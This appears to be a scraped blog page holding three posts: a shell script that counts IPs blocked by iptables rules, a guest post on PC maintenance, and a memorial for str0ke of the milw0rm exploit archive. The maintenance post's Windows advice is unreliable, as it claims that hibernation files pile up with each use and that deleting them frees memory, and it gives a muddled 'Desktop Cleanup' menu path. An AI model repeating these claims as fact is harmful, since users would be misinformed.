The script requires awk, iptables, and whatmask in order to run successfully. The script also assumes all IPs are in CIDR notation; single IPs throw an error, "whatmask: "97.53.154.29" is not a valid subnet mask or wildcard bit mask!

The Script

[nullamatix ~/ipcount]:# cat /usr/bin/ipcount
#!/bin/sh
echo 'Building droplist.txt'
iptables -L INPUT -n | \
grep DROP | awk '{print $4}' | \
sed 's/^DROP.*$//' | grep -v '0.0.0.0' \
> ~/ipcount/droplist.txt

echo 'Reading droplist.txt'
cat ~/ipcount/droplist.txt |while true
do read LINE || break
whatmask $LINE | grep 'Usable IP Addresses' | \
awk '{print $6}' | sed -e 's/,//g' >> ~/ipcount/cidr-totals.txt
done

echo 'Adding cidr-totals.txt'
awk '{total+=$0} END {print total}' ~/ipcount/cidr-totals.txt
echo 'Done.'
[nullamatix ~/ipcount]:#

Installation

Setup is easy and just like any other script...

[nullamatix ~]:# mkdir ipcount
[nullamatix ~]:# vim /usr/bin/ipcount

(copy & paste the script above)

[nullamatix ~]:# chmod +x /usr/bin/ipcount
[nullamatix ~]:# which ipcount
/usr/bin/ipcount
[nullamatix ~]:#

At the time of writing, nullamatix.com is blocking a grand total of 318,516,468 IPs. That's roughly 7% of the available IPv4 address space. How many IPs are you blocking?

See Also:

• 01/17/2010 -- New Tool: IP Range to CIDR
  Excerpt: "At least twice a week I find myself visiting ip2cidr.com, the IP to CIDR converter. Since the owner/author of the site hasn't release the source code, and I love a challenge, I developed my own version. The guys at the job find the tool useful, and after a ..."
  
• 10/23/2009 -- DIY: Home Surveillance System with VLC
  Excerpt: "The current state of the global economy has shot the U.S. unemployment rate up - waay up. As a result, more people are willing to commit crimes in order to provide for themselves or their family. Just this year, two houses that share the street I live on were ..."
  
• 08/31/2009 -- Howto: Insert Bash Command Output Into MySQL
  Excerpt: "A BlogStorm reader emailed me today, Hello, I am replying to your post on http://www.blogstorm.co.uk/how-to-scrape-pages-with-coldfusion/ Wanted to see your experience in page scraping, may need your help on a project. HOw much did you do beyond the ..."
  
• 02/11/2008 -- Howto: Setup cron Jobs to Restart Lighttpd & MySQL
  Excerpt: "Over the past couple weeks MySQL crashed when spiked with large amounts of traffic. To remedy this, a cron job has been implemented to simply restart mysql and lighttpd every other day. Here's how it's done. First, if you haven't already, define a cron job ..."
  

Simple Hardware Maintenance

Get a soft paintbrush and an air duster (can of compressed air). Turn your keyboard upside down and move the brush along the space between the keys in a sort of forward and backward motion. This action does not need to be done with much force. You can then use the air duster to get anything you may have missed.

Blowing the dust off from the machine with good enough air pressure is also a wise thing to do. Make sure you get the fans really well. If you are up to it, you can open up the machine and use the air duster to clean the computer case. Make sure to get the CPU and video card fans. If you do this, make sure to unplug the computer before opening the case.

Software Maintenance

Use Desktop Cleanup

The desktop cleanup utility is a feature available in Windows that lets you optimize your computer. It cleans up hibernation files, which are stored on the computer each time you hibernate. For example, if your computer has been in hibernation three times, you probably have 2 or 3GB of hibernated files to delete to free up memory space.

Other files such as temporary Internet files, thumbnails, and offline web messages are removed in the process to save up space as well. Remember, the goal here is to delete files that are not useful anymore to save space for the computer. To carry out this operation, from the start menu, click computer->right-click and follow the drop down window to property-> Performance-> Open Desktop Cleanup. Follow the instructions to save up space.

Disk Defragmenter

Data is stored on the hard drive. As you use your computer, this data is not stored in the most efficient way. The defragmenter simply arranges and solidifies the files on the hard drive which makes data access quicker. To get to from the start menu click on computer->right-click and follow the drop down window to property-> Performance-> Open disk defragmenter. Defragmenting a disk might take an hour or two, give and take, depending on the size of the disk.

Dominic, the author of this post, maintains ComputerTooSlow.com; a site dedicated to helping end users overcome any PC related obstacles. For more PC Maintenance tips as simple and effective as these, check out Dominic's site at Computer Too Slow.

See Also:

• 02/15/2008 -- Picture: The Importance of a Good Firewall
  Excerpt: "This is what happened when I took down my network's defenses the other day. Fortunately my Windows machines were patched, or I might have been hit with a nasty remote exploit, or eighty. Click the thumbnail for the larger version. Those are all incoming ..."
  
• 11/30/2007 -- Windows XP SP3 (Service Pack 3) Improves Performance
  Excerpt: "Several sites reported noticeable performance increases after installing XP SP3, but there's only one way to really find out; test the service pack yourself. A side by side comparison of two Dell Latitude D820 notebooks, one with SP2 and one with SP3 (beta), ..."
  
• 11/27/2007 -- Dell Diagnostic Beep Code Troubleshooting Chart
  Excerpt: "Those beeps your computer emits at startup, yea, they mean something. If you're having difficulty figuring out why your Dell desktop, tower, or mini tower won't boot, take a look at this chart. Dell also has a diagnostics utility and can provide excellent ..."
  
• 11/13/2007 -- If You Work in IT, Please Write Clear, Objective Information
  Excerpt: "Google defines objective as: undistorted by emotion or personal bias; based on observable phenomena; "an objective appraisal"; "objective evidence" This morning, my colleague starts sending me quotes from a service request (ticket) he's working. Clear ..."
  

See anon's comment below.

http://twitter.com/str0ke/status/5422531377

***

I first heard the sad news from Michael on the Full-disclosure mailing list.

On Wed, Nov 4, 2009 at 9:19 AM, Micheal Turner wrote:
We are mourning a good friend today. I first begun talking to str0ke when I started publishing exploit codes onto this mailing list, he would always be polite and friendly in his emails. I got to know him over the years and am saddened by his departure, he contributed to the exploit scene and hacking subculture in a huge way. The last time I talked with him I asked him if I could interview him for my blog, he laughed and said he should be interviewing the exploit writers since he didnt do anything. That was str0ke and str0ke did alot, he always fought for the rights of the exploit developers and his website was the bread and butter of many a hackers day. He will sadly be missed by many people, hackers & friends.

At least now we can post exploits without that damn // milw0rm.com comment being added to the end!!! I joke, this code is dedicated to you str0ke. R.I.P my friend.

And eventually found an article from a blogspot blog with more details. Here's BL4CK's post:

Tuesday, November 3, 2009 - Str0ke @ Milworm's Funeral is This Friday

Many of us have wondered where str0ke has been and why milw0rm has not been updated in a good while. I recently was informed that str0ke has been hospitalized due to a strange condition with his heart, which he has had since he was a child.

Sadly....

I've just received information that str0ke @ milw0rm has passed away due to cardiac arrest early this morning at 9:23 AM. We @ blacksecurity are deeply saddened by the loss of a good hearted friend.

We wish nothing but blessing to his wife and 4 children.

RIP str0ke 1974-04-29 - 2009-11-03 09:23

Always seems the good people are the first to go. May peace be with you and your family, str0ke. You'll be missed...

See Also:

• 01/06/2008 -- Wordpress Users, Beware – New Vulnerability Release
  Excerpt: "Milworm has announced a new exploit for the Wordpress Plugin, WP-Filemanager 1.2. The hole lets attackers upload pretty much anything they want, including evil PHP scripts. For the details, check out: http://www.milw0rm.com/exploits/4844 If you don't ..."
  
• 12/31/2007 -- Updates and a Happy New Year
  Excerpt: "A recently released Wordpress vulnerability proof of concept forced me to update Wordpress, and as a result, several plug-ins are now failing to work properly. I don't regret performing the update because not only were the security holes patched, but database ..."